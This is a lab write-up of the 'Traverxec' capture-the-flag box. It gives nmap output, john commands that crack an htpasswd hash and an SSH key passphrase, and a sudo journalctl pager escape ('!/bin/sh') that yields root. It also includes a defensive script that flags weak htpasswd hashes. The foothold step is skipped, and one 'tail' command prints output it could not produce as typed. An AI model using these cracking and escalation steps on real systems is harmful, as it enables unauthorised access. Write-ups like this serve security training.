Traverxec is a box labeled Easy where the initial foothold is established by exploiting improper security settings, followed by leveraging a UNIX binary to bypass local security restrictions.
Enumeration reveals two open ports: SSH and HTTP.
root@kali:~/projects/Traverxec# nmap -sS -Pn -A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-23 05:25 EST
Nmap scan report for 10.10.10.165
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Browsing to http://10.10.10.165/img/portfolio/, we notice the web page is served by nostromo 1.9.6.
Run LinEnum and notice an htpasswd file containing a password hash:
[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Crack it with john. The password is Nowonly4me.
root@kali:~/projects/Traverxec# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
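The hash above cracked in seconds because nostromo stored it as md5crypt ($1$), a fast scheme that wordlist attacks chew through on commodity hardware. The following audit script is an added example (not from the box or this writeup) that parses an htpasswd-style file and flags entries whose hash scheme should be rehashed with bcrypt; the file contents are constructed, and the scheme prefixes are standard crypt(3)/htpasswd conventions.

```python
# Prefix -> (scheme, acceptable). bcrypt and sha-crypt are slow by design;
# md5crypt ($1$ / $apr1$), unsalted SHA-1 and DES crypt fall to wordlists fast.
import re

SCHEMES = {
    "$2y$": ("bcrypt", True),
    "$5$": ("sha256-crypt", True),
    "$6$": ("sha512-crypt", True),
    "$1$": ("md5crypt", False),
    "$apr1$": ("Apache md5crypt", False),
    "{SHA}": ("unsalted SHA-1", False),
}
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")  # legacy 13-char DES crypt


def classify(hash_field):
    """Return (scheme, acceptable) for one htpasswd hash field."""
    for prefix, info in SCHEMES.items():
        if hash_field.startswith(prefix):
            return info
    if DES_CRYPT.match(hash_field):
        return ("DES crypt", False)
    return ("unknown", False)  # unrecognised schemes are reported, not ignored


def audit_htpasswd(text):
    """Parse 'user:hash' lines; return [(user, scheme, acceptable), ...]."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, hash_field = line.split(":", 1)
        findings.append((user,) + classify(hash_field.strip()))
    return findings


def weak_users(text):
    """Accounts whose hashes should be rehashed with bcrypt."""
    return [user for user, _, ok in audit_htpasswd(text) if not ok]


# Constructed sample file: salts and digests are filler of the right shape,
# not credentials from any real host.
SAMPLE_HTPASSWD = """\
# nostromo basic-auth users (constructed)
david:$1$saltsalt$AAAAAAAAAAAAAAAAAAAAAA
legacy:abJnggxhB/yWI
ops:$apr1$saltsalt$BBBBBBBBBBBBBBBBBBBBBB
admin:$2y$10$CCCCCCCCCCCCCCCCCCCCCC.DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
"""
```

Running `weak_users(SAMPLE_HTPASSWD)` returns the three accounts whose hashes are cheap to crack; only the bcrypt entry passes.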
A backup of the SSH public and private keys was found in tmp/.fuckoff.
Convert the RSA key to a format that John recognizes:
root@kali:~/projects/Traverxec/keys# /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
Crack the passphrase using John. The passphrase is hunter.
root@kali:~/projects/Traverxec/keys# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:10) 0.1949g/s 2795Kp/s 2795Kc/s 2795KC/sa6_123..*7¡Vamos!
Session completed
Log in using the key and passphrase, then collect the user flag:
# ssh -i id_rsa david@10.10.10.165
david@traverxec:~$ cat ~/user.txt
7db0b48469606a42cec20750d9782f3d
Visit https://gtfobins.github.io/ - this is a curated list of UNIX binaries that can be exploited by an attacker to bypass local security restrictions. It's a resource that I've used countless times and I recommend it to anyone preparing for certification exams.
The script server-stats.sh in /home/david/bin/ contains a command executed using sudo (journalctl). The script pipes its output through cat, but the sudo rule allows running journalctl on its own, where it falls back to a pager and the restricted environment can be broken out of.
https://gtfobins.github.io/gtfobins/journalctl/
david@traverxec:~/bin$ ls ~/bin/server-stats.sh
/home/david/bin/server-stats.sh
david@traverxec:~/bin$ tail
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Invoke the command and break out of the restricted environment:
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2019-11-24 13:32:42 EST, end at Sun 2019-11-24 13:40:20 EST. --
Nov 24 13:39:48 traverxec sudo[24788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/11 ruser=www-data r
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): conversation failed
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Nov 24 13:39:50 traverxec sudo[24788]: www-data : command not allowed ; TTY=pts/11 ; PWD=/tmp ; USER=root ; COMMAND=list
Nov 24 13:40:08 traverxec crontab[25707]: (www-data) LIST (www-data)
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
Get the root flag located in /root:
# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906